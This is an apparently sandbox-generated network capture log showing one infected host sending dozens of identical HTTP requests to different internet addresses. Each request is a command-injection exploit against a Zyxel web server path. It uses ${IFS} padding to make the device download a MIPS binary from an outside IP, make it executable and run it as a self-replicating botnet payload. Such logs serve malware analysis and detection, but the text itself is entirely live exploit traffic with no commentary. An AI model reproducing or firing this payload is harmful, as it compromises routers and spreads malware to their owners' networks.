                                      Jan 14, 2024 15:51:03.697231054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8785192.168.2.1453858163.230.239.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697284937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8786192.168.2.1441254200.159.121.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697329044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8787192.168.2.1450412180.112.63.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697381020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8788192.168.2.14569141.115.106.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697428942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8789192.168.2.145782867.104.204.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697468042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8790192.168.2.1444416149.104.196.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697525978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8791192.168.2.145431070.131.162.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697559118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8792192.168.2.145610635.78.174.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697587967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8793192.168.2.1449044140.49.141.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697638988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8794192.168.2.144973263.47.52.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697690964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8795192.168.2.1434126160.2.5.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697726965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8796192.168.2.145261490.105.43.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697763920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8797192.168.2.1434650162.135.218.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697820902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8798192.168.2.144152885.159.28.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697866917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8799192.168.2.1438752200.197.55.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697915077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8800192.168.2.1458872105.32.165.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697943926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8801192.168.2.1457128222.11.250.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.697981119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8802192.168.2.1433834192.105.226.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698045015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8803192.168.2.1451924124.143.16.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698069096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8804192.168.2.1453146207.180.190.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698138952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8805192.168.2.1459298196.66.116.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698168039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8806192.168.2.1435664162.247.145.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698214054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8807192.168.2.1439788147.42.216.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698240995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8808192.168.2.1438438221.250.38.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698272943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8809192.168.2.145216267.156.221.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698323011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8810192.168.2.1438712171.141.5.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698383093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8811192.168.2.1444548179.156.16.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698419094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8812192.168.2.144900075.208.83.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698438883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8813192.168.2.1443644132.69.242.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698472023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8814192.168.2.1437626123.16.65.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698517084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8815192.168.2.1455440100.240.103.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698543072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8816192.168.2.144295891.112.69.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698599100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8817192.168.2.144961877.122.174.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698640108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8818192.168.2.144548448.195.247.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698688984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8819192.168.2.144980236.60.107.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698731899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8820192.168.2.144416820.11.17.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698801994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8821192.168.2.1446156182.200.105.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698816061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8822192.168.2.143883889.19.23.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698839903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8823192.168.2.1440546207.243.107.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698899984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8824192.168.2.1443504203.198.213.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698950052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8825192.168.2.1442294124.102.253.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.698982000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8826192.168.2.1460292164.85.190.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699027061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8827192.168.2.1440618186.221.52.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699059963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8828192.168.2.1438476106.122.26.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699105024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8829192.168.2.143991412.35.22.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699129105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8830192.168.2.1440676217.117.43.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699184895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8831192.168.2.1438856106.241.114.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699250937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8832192.168.2.1445936115.89.36.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699276924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8833192.168.2.143895658.7.216.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699309111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8834192.168.2.1449290124.62.100.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699368954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8835192.168.2.143758697.97.211.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699418068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8836192.168.2.1444746151.15.8.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699445009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8837192.168.2.1433710118.2.182.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699479103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8838192.168.2.1445688188.85.244.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699507952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8839192.168.2.1442326203.241.168.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699577093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8840192.168.2.144253278.242.137.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699628115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8841192.168.2.1456112182.123.29.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699671984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8842192.168.2.14418345.151.176.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699706078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8843192.168.2.1453956210.129.186.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699762106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8844192.168.2.1452124182.58.226.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699812889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8845192.168.2.1455430126.94.113.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699839115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8846192.168.2.145779089.48.93.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699872017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8847192.168.2.145212263.246.201.77443
                                      TimestampBytes transferredDirectionData
